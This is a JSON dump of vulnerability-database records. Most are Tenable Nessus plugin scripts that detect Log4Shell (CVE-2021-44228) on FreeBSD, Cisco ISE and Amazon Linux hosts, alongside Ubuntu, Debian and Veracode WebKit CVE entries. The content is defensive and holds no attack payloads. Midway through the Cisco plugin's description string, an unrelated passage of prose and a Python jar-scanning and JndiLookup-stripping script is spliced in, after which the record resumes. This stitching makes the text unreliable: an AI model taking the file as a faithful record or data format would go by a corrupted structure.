script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"FreeBSD : serviio -- affected by log4j vulnerability (1ea05bb8-5d74-11ec-bb1e-001517a2e1a4)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version 
of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the 1ea05bb8-5d74-11ec-bb1e-001517a2e1a4 advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect\n against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log\n messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup\n substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous\n releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to\n true or it can be mitigated in prior releases (<2.10) by removing the JndiLookup class from the\n classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).\n (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://vuxml.freebsd.org/freebsd/1ea05bb8-5d74-11ec-bb1e-001517a2e1a4.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a7ebd9ba\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", 
value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:serviio\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"freebsd_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nvar flag = 0;\n\nvar packages = [\n 'serviio<2.2.1'\n];\n\nforeach var package( packages ) {\n if (pkg_test(save_report:TRUE, pkg: package)) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : pkg_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:45:31", "description": "Cisco Identity Services Engine is affected by the following critical vulnerability in the Apache Log4j Java logging library as descibed in 
the cisco-sa-apache-log4j-qRuKNEbd advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-05-02T00:00:00", "type": "nessus", "title": "Cisco Identity Services Log4j Engine Remote Code Execution (cisco-sa-apache-log4j-qRuKNEbd)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-02-17T00:00:00", "cpe": ["cpe:/h:cisco:identity_services_engine", "cpe:/a:cisco:identity_services_engine", "cpe:/a:cisco:identity_services_engine_software"], "id": "CISCO-SA-APACHE-LOG4J-QRUKNEBD-ISE.NASL", "href": "https://www.tenable.com/plugins/nessus/160400", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160400);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/17\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa47133\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-apache-log4j-qRuKNEbd\");\n script_xref(name:\"IAVA\", value:\"2022-A-0138-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n script_xref(name:\"CEA-ID\", 
value:\"CEA-2023-0004\");\n\n script_name(english:\"Cisco Identity Services Log4j Engine Remote Code Execution (cisco-sa-apache-log4j-qRuKNEbd)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A package installed on the remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Cisco Identity Services Engine is affected by the following critical vulnerability in the Apache Log4j Java \nlogging library as descibed in the cisco-sa-apache-log4j-qRuKNEbd advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log\n messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from\n LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been\n disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this\n vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging\n Services projects. 
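The serviio advisory text above names the two stop-gaps for a host that cannot upgrade log4j-core at once: set the `log4j2.formatMsgNoLookups` system property to true, which only works on 2.10 and later, or delete `JndiLookup.class` from the jar with `zip -q -d`. The Cisco UCS Director and ISE entries describe the same flaw and note that 2.16.0 removes the lookup code outright, which remains the real fix. The Python below is an added example, not Tenable's plugin code or anything from the vendors named: it finds the class in every jar under a directory, including jars bundled one level down inside war or ear files (which the zip one-liner on a single file misses), and performs the deletion as an atomic rewrite of the jar. The log4j-core jar and the war it scans are constructed fixtures whose `.class` entries hold placeholder bytes, not real log4j artifacts.

```python
"""Log4Shell (CVE-2021-44228) jar triage: locate and strip JndiLookup.class.
Added example, not Tenable's or the FreeBSD VuXML project's code. Reproduces the
`zip -q -d <jar> org/apache/logging/log4j/core/lookup/JndiLookup.class`
mitigation quoted above and also looks one level into nested jars. Fixtures
are constructed in a temp directory."""
import io
import os
import tempfile
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear")


def scan_jar_bytes(data: bytes, path: str):
    """Locations containing JndiLookup.class; nested archives are reported as outer!inner."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        if JNDI_LOOKUP in names:
            hits.append(path)
        for name in names:
            if name.endswith(ARCHIVE_SUFFIXES):
                hits.extend(scan_jar_bytes(zf.read(name), f"{path}!{name}"))
    return hits


def scan_tree(root: str):
    """Walk a directory and scan every jar/war/ear found."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.endswith(ARCHIVE_SUFFIXES):
                full = os.path.join(dirpath, fn)
                with open(full, "rb") as f:
                    hits.extend(scan_jar_bytes(f.read(), full))
    return hits


def strip_jndi_lookup(jar_path: str) -> bool:
    """Rewrite a top-level jar without JndiLookup.class; True if an entry was removed.
    A copy nested inside a war/ear is only reported: fixing it means rebuilding
    the outer archive, which this function deliberately does not attempt."""
    with open(jar_path, "rb") as f:
        original = f.read()
    with zipfile.ZipFile(io.BytesIO(original)) as src:
        if JNDI_LOOKUP not in src.namelist():
            return False
        out = io.BytesIO()
        with zipfile.ZipFile(out, "w") as dst:
            for info in src.infolist():          # keep every other entry and its metadata
                if info.filename != JNDI_LOOKUP:
                    dst.writestr(info, src.read(info.filename))
    tmp = jar_path + ".tmp"
    with open(tmp, "wb") as f:
        f.write(out.getvalue())
    os.replace(tmp, jar_path)                    # atomic swap: never a half-written jar on disk
    return True


def make_samples(workdir: str):
    """Constructed fixtures: a bare log4j-core jar and a war that bundles a copy of it."""
    core = io.BytesIO()
    with zipfile.ZipFile(core, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("org/apache/logging/log4j/core/lookup/StrLookup.class", b"")
        zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")   # class-file magic only, not bytecode
    core_path = os.path.join(workdir, "log4j-core-2.14.1.jar")
    with open(core_path, "wb") as f:
        f.write(core.getvalue())
    war_path = os.path.join(workdir, "app.war")
    with zipfile.ZipFile(war_path, "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", core.getvalue())
    return core_path, war_path


def run_demo():
    """Build the fixtures, scan, strip the top-level jar, and scan again."""
    workdir = tempfile.mkdtemp(prefix="log4shell-demo-")
    core_path, war_path = make_samples(workdir)
    before = sorted(scan_tree(workdir))
    removed = strip_jndi_lookup(core_path)
    after = sorted(scan_tree(workdir))
    return {"before": before, "removed": removed, "after": after,
            "core": core_path, "war": war_path}


if __name__ == "__main__":
    result = run_demo()
    print("before:", result["before"])
    print("removed from top-level jar:", result["removed"])
    print("after: ", result["after"])
```

After the run the bare jar is clean but the copy inside `app.war` is still reported, which is the point of scanning nested archives: a host can pass a check on its `lib/` directory and still load a vulnerable log4j-core from a deployed web application. Deleting the class disables JNDI lookups but leaves the rest of the vulnerable release in place, so treat it as a bridge to the upgrade the advisories above prescribe.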
(CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?395cf983\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID CSCwa47133\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:identity_services_engine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:identity_services_engine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:identity_services_engine_software\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ise_detect.nbin\");\n script_require_keys(\"Host/Cisco/ISE/version\");\n\n exit(0);\n}\ninclude('ccf.inc');\ninclude('cisco_ise_func.inc');\n\nvar product_info = cisco::get_product_info(name:'Cisco Identity Services Engine Software');\n\nvar vuln_ranges = [\n {'min_ver':'2.4', 'fix_ver':'2.6.0.156', required_patch:'11'},\n {'min_ver':'2.7', 'fix_ver':'2.7.0.356', required_patch:'7'},\n {'min_ver':'3.0', 'fix_ver':'3.0.0.458', required_patch:'5'},\n {'min_ver':'3.1', 'fix_ver':'3.1.0.518', required_patch:'1'}\n];\n\nvar required_patch = get_required_patch(vuln_ranges:vuln_ranges, version:product_info['version']);\n\nif (empty_or_null(required_patch))\n audit(AUDIT_HOST_NOT, 'affected');\n\nvar reporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['version'],\n 'bug_id' , 'CSCwa47133',\n 'disable_caveat', TRUE,\n 'fix' , 'See vendor advisory'\n);\n\ncisco::check_and_report(\n product_info:product_info,\n reporting:reporting,\n vuln_ranges:vuln_ranges,\n required_patch:required_patch\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-30T17:57:24", "description": "The version of log4j-cve-2021-44228-hotpatch installed on the remote host is prior to 1.3-5. 
It is, therefore, affected by a vulnerability as referenced in the ALAS2-2022-1806 advisory.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-06-16T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : log4j-cve-2021-44228-hotpatch (ALAS-2022-1806)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-29T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:log4j-cve-2021-44228-hotpatch", "cpe:/o:amazon:linux:2"], "id": "AL2_ALAS-2022-1806.NASL", "href": "https://www.tenable.com/plugins/nessus/162309", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2022-1806.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162309);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/29\");\n\n script_name(english:\"Amazon Linux 2 : log4j-cve-2021-44228-hotpatch (ALAS-2022-1806)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of log4j-cve-2021-44228-hotpatch installed on the remote host is prior to 1.3-5. 
It is, therefore, affected\nby a vulnerability as referenced in the ALAS2-2022-1806 advisory.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2/ALAS-2022-1806.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update log4j-cve-2021-44228-hotpatch' to update your system.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:log4j-cve-2021-44228-hotpatch\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nvar os_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'log4j-cve-2021-44228-hotpatch-1.3-5.amzn2', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = 
package_array['exists_check'];\n if (reference && release && (!exists_check || rpm_exists(release:release, rpm:exists_check))) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"log4j-cve-2021-44228-hotpatch\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-26T15:39:56", "description": "The version of Apache Apereo CAS running on the remote web server is affected by a remote code execution vulnerability in the bundled Apache Log4j logging library. Apache Log4j is vulnerable due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can exploit this, via a web request, to execute arbitrary code with the permission level of the running Java process.\n\nThis plugin requires that both the scanner and target machine have internet access.", "cvss3": {}, "published": "2022-07-26T00:00:00", "type": "nessus", "title": "Apache Apereo CAS Log4Shell Direct Check (CVE-2021-44228)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-25T00:00:00", "cpe": ["cpe:/a:apereo:central_authentication_service"], "id": "APACHE_APEREO_CAS_LOG4SHELL.NBIN", "href": "https://www.tenable.com/plugins/nessus/163453", "sourceData": "Binary data apache_apereo_cas_log4shell.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}], "ubuntucve": [{"lastseen": "2023-11-28T13:49:25", "description": "A cross-origin issue in the IndexDB API was addressed with improved input\nvalidation. 
This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4,\ntvOS 15.3, Safari 15.3, macOS Monterey 12.2. A website may be able to track\nsensitive user information.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-03-18T00:00:00", "type": "ubuntucve", "title": "CVE-2022-22594", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22594"], "modified": "2022-03-18T00:00:00", "id": "UB:CVE-2022-22594", "href": "https://ubuntu.com/security/CVE-2022-22594", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-11-28T13:49:23", "description": "A use after free issue was addressed with improved memory management. This\nissue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1,\nSafari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously\ncrafted web content may lead to arbitrary code execution. 
Apple is aware of\na report that this issue may have been actively exploited.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T00:00:00", "type": "ubuntucve", "title": "CVE-2022-22620", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-03-18T00:00:00", "id": "UB:CVE-2022-22620", "href": "https://ubuntu.com/security/CVE-2022-22620", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2023-11-27T15:14:19", "description": "A cross-origin issue in the IndexDB API was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. 
A website may be able to track sensitive user information.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-03-18T18:15:00", "type": "debiancve", "title": "CVE-2022-22594", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22594"], "modified": "2022-03-18T18:15:00", "id": "DEBIANCVE:CVE-2022-22594", "href": "https://security-tracker.debian.org/tracker/CVE-2022-22594", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-11-27T15:14:19", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. 
Apple is aware of a report that this issue may have been actively exploited.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "debiancve", "title": "CVE-2022-22620", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-03-18T18:15:00", "id": "DEBIANCVE:CVE-2022-22620", "href": "https://security-tracker.debian.org/tracker/CVE-2022-22620", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2022-07-17T12:58:20", "description": "webkit2gtk:edge is vulnerable to denial of service.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-02-05T14:50:27", "type": "veracode", "title": "Denial Of Service (DoS)", 
"bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22594"], "modified": "2022-03-18T20:37:27", "id": "VERACODE:34009", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-34009/summary", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-09-01T08:11:26", "description": "webkit2gtk edge is vulnerable to denial of service. This allows an attacker to process maliciously crafted web content and execute arbitrary code on the system.\n", "cvss3": {"exploitabilityScore": 2.8, 